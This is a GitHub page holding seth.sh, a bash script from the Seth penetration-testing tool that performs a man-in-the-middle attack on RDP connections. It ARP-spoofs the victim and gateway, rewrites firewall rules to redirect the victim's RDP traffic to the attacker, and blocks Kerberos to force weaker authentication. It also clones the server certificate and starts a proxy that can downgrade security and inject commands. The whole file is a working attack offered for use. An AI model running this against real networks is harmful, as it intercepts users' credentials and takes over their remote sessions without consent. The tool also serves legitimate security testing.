-
Notifications
You must be signed in to change notification settings - Fork 322
/
seth.sh
executable file
·247 lines (209 loc) · 7.5 KB
/
seth.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
#!/bin/bash
cat << EOF
███████╗███████╗████████╗██╗ ██╗
██╔════╝██╔════╝╚══██╔══╝██║ ██║ by Adrian Vollmer
███████╗█████╗ ██║ ███████║ [email protected]
╚════██║██╔══╝ ██║ ██╔══██║ SySS GmbH, 2017
███████║███████╗ ██║ ██║ ██║ https://www.syss.de
╚══════╝╚══════╝ ╚═╝ ╚═╝ ╚═╝
EOF
set -e
# Ensure we have root permission
if [ "$(id -u)" != "0" ]; then
echo "This script must be run as root" 1>&2
exit 1
fi
# Ensure we have all the required arguments
if [ "$#" -ne 4 -a "$#" -ne 5 ];
then
echo "Usage:"
echo "$0 <INTERFACE> <ATTACKER_IP> <VICTIM_IP> <GATEWAY_IP|HOST_IP> [<COMMAND>]"
exit 1
fi
# Get OS Name
OS=$(uname -s)
# Setup requirements based on OS
# Darwin (MacOS) uses pf as the packet filter module
# while Linux uses iptables
if [ "$OS" == "Darwin" ];
then
echo "[*] Darwin OS detected, using pfctl as the netfilter interpreter"
NETFILTER_INTERPRETER=pfctl
elif [ "$OS" == "Linux" ];
then
echo "[*] Linux OS detected, using iptables as the netfilter interpreter"
NETFILTER_INTERPRETER=iptables
else
echo "[*] Cannot determinate netfilter interpreter for "$OS" Kernel. Exit..."
exit 1
fi
# Verify Dependencies
# Note: dsniff seems to be abandoned
# TODO: implement own arpspoofer, or relay on something currently maitained eg: bettercap
for com in awk tcpdump arpspoof openssl $NETFILTER_INTERPRETER ; do
command -v "$com" >/dev/null 2>&1 || {
echo >&2 "$com required, but it's not installed. Aborting."
exit 1
}
done
# Setup variables from cli
IFACE="$1"
ATTACKER_IP="$2"
VICTIM_IP="$3"
GATEWAY_IP="$4"
INJECT_COMMAND="$5"
if [ -z "$SETH_DOWNGRADE" ] ; then
SETH_DOWNGRADE=3
fi
if [ ! -z "$SETH_DEBUG" ] ; then
DEBUG_FLAG="-d"
fi
if [ ! -z "$INJECT_COMMAND" ] ; then
INJECT_COMMAND="-j \"$INJECT_COMMAND\""
fi
# Check if we're on macOS, we need some specific variables for pf environment
if [ "$OS" == "Darwin" ];
then
# Get current pf status so we can restore it on exit
PF_STATUS="$(pfctl -qs info | head -1 | awk '{print $2}')"
# Set a temp file to write pf rules
PF_TMP_FILE="/tmp/seth.pf"
# Get current conf file
PF_CONF_FILE="/private/etc/pf.conf"
# Get pfctl bin
PFCTL="/sbin/pfctl"
fi
# Get forwarding state
if [ "$OS" == "Darwin" ];
then
IP_FORWARD=$(sysctl net.inet.ip.forwarding | awk '{print $2}')
# Enable pf if not alredy running
if [ "$PF_STATUS" == "Disabled" ];
then
$PFCTL -E
fi
else
IP_FORWARD="$(cat /proc/sys/net/ipv4/ip_forward)"
fi
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
# Define funciton to add/remove iptables rules on the fly for RDP routing and NAT
set_iptables_1 () {
local DEL_ADD="$1"
iptables -"$DEL_ADD" FORWARD -p tcp -s "$VICTIM_IP" \
--syn --dport 3389 -j REJECT
}
set_iptables_2 () {
local DEL_ADD="$1"
iptables -t nat -"$DEL_ADD" PREROUTING -p tcp -d "$ORIGINAL_DEST" \
-s "$VICTIM_IP" --dport 3389 -j DNAT --to-destination "$ATTACKER_IP"
iptables -"$DEL_ADD" FORWARD -p tcp -s "$VICTIM_IP" --dport 88 \
-j REJECT --reject-with tcp-reset
}
# Define function to add/remove pf rules on the fly for RDP routing and NAT
set_pf_1 () {
echo "block return on "$IFACE" proto tcp from "$VICTIM_IP" to any port 3389 flags S/S" >> $PF_TMP_FILE
$PFCTL -qf $PF_TMP_FILE 2>/dev/null 1>&2
}
set_pf_2 () {
rm $PF_TMP_FILE 2>/dev/null 1>&2
echo "rdr on $IFACE inet proto {tcp, udp} from $VICTIM_IP to $ORIGINAL_DEST port 3389 -> $ATTACKER_IP" >> $PF_TMP_FILE
# Drop Kerberos packers
echo "block return-rst on $IFACE proto tcp from $VICTIM_IP to any port 88" >> $PF_TMP_FILE
$PFCTL -qf $PF_TMP_FILE 2>/dev/null 1>&2
}
# Declare a finish function to cleanup the system
function finish {
echo "[*] Cleaning up..."
set +e
if [ "$OS" == "Darwin" ];
then
echo "[*]" $(sysctl net.inet.ip.forwarding=0)
echo "[*]" $(sysctl net.inet.icmp.bmcastecho=1)
# Flush everything from pf queues
$PFCTL -qF all 2>/dev/null 1>&2
echo "[*] Restore default pf status and configuration"
# If PF was disabled, disable it, otherwise reload the default conf file
if [ "$PF_STATUS" == "Disabled" ];
then
$PFCTL -qd 2>/dev/null 1>&2
else
$PFCTL -qf $PF_CONF_FILE 2>/dev/null 1>&2
fi
rm $PF_TMP_FILE 2>/dev/null 1>&2
else
set_iptables_1 D 2>/dev/null 1>&2
set_iptables_2 D 2>/dev/null 1>&2
printf "%s" "$IP_FORWARD" > /proc/sys/net/ipv4/ip_forward
fi
kill $ARP_PID_1 2>/dev/null 1>&2
kill $ARP_PID_2 2>/dev/null 1>&2
pkill -P $$
# Clear certificates
find /tmp/ -name "$ORIGINAL_DEST"* -exec rm {} \; 2>/dev/null 1>&2
echo "[*] Done"
}
trap finish EXIT
# Define a function to create a self-signed certificate
function create_self_signed_cert {
local CN="$1"
echo "[!] Failed to clone certificate, create bogus self-signed certificate..." >&2
openssl req -subj "/CN=$CN/O=Seth by SySS GmbH" -new \
-newkey rsa:2048 -days 365 -nodes -x509 \
-keyout /tmp/$CN.server.key -out /tmp/$CN.server.crt 2>/dev/null 1>&2
printf "%s\n%s\n" "/tmp/$CN.server.key" "/tmp/$CN.server.crt"
}
# Spoof arp replies
echo "[*] Spoofing arp replies..."
arpspoof -i "$IFACE" -t "$VICTIM_IP" "$GATEWAY_IP" 2>/dev/null 1>&2 &
ARP_PID_1=$!
arpspoof -i "$IFACE" -t "$GATEWAY_IP" "$VICTIM_IP" 2>/dev/null 1>&2 &
ARP_PID_2=$!
# Enable ip forwarding and setup rule for SYN packets
echo "[*] Turning on IP forwarding..."
if [ "$OS" == "Darwin" ];
then
echo "[*]" $(sysctl net.inet.ip.forwarding=1)
echo "[*]" $(sysctl net.inet.icmp.bmcastecho=0)
echo "[*] Set pf rules for SYN packets..."
set_pf_1 2>/dev/null 1>&2 &
else
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "[*] Set iptables rules for SYN packets..."
set_iptables_1 A "$VICTIM_IP"
fi
# Inspect traffic looking for our SYN packet for an RDP connection
echo "[*] Waiting for a SYN packet to the original destination..."
ORIGINAL_DEST="$(tcpdump -n -c 1 -i "$IFACE" \
"tcp[tcpflags] & (tcp-syn) != 0" and \
src host "$VICTIM_IP" and dst port 3389 2> /dev/null \
| awk '{print $5}' | sed 's/.\(3389\|ms-wbt-server\).*//')"
if [ -z "$ORIGINAL_DEST" ];
then
echo "[!] Something went wrong while parsing the output of tcpdump"
exit 1
fi
echo "[+] Got it! Original destination is $ORIGINAL_DEST"
# Clone the original certificate so we can inspect traffic
echo "[*] Clone the x509 certificate of the original destination..."
CERT_KEY="$($SCRIPT_DIR/clone-cert.sh "$ORIGINAL_DEST:3389" || \
create_self_signed_cert "$ORIGINAL_DEST")"
KEYPATH="$(printf "%s" "$CERT_KEY" | head -n1)"
CERTPATH="$(printf "%s" "$CERT_KEY" | tail -n1)"
# Setup iptables and pf rules for the whole RDP connection
if [ "$OS" == "Darwin" ];
then
echo "[*] Adjust pf rules for all packets..."
set_pf_2 2>/dev/null 1>&2 &
else
echo "[*] Adjust iptables rules for all packets..."
set +e
set_iptables_1 D "$VICTIM_IP"
set -e
set_iptables_2 A "$VICTIM_IP" "$ATTACKER_IP" "$ORIGINAL_DEST"
fi
# Run the RDP proxy
echo "[*] Run RDP proxy..."
$SCRIPT_DIR/seth.py \
$INJECT_COMMAND $DEBUG_FLAG -g $SETH_DOWNGRADE \
-c $CERTPATH -k $KEYPATH \
$ORIGINAL_DEST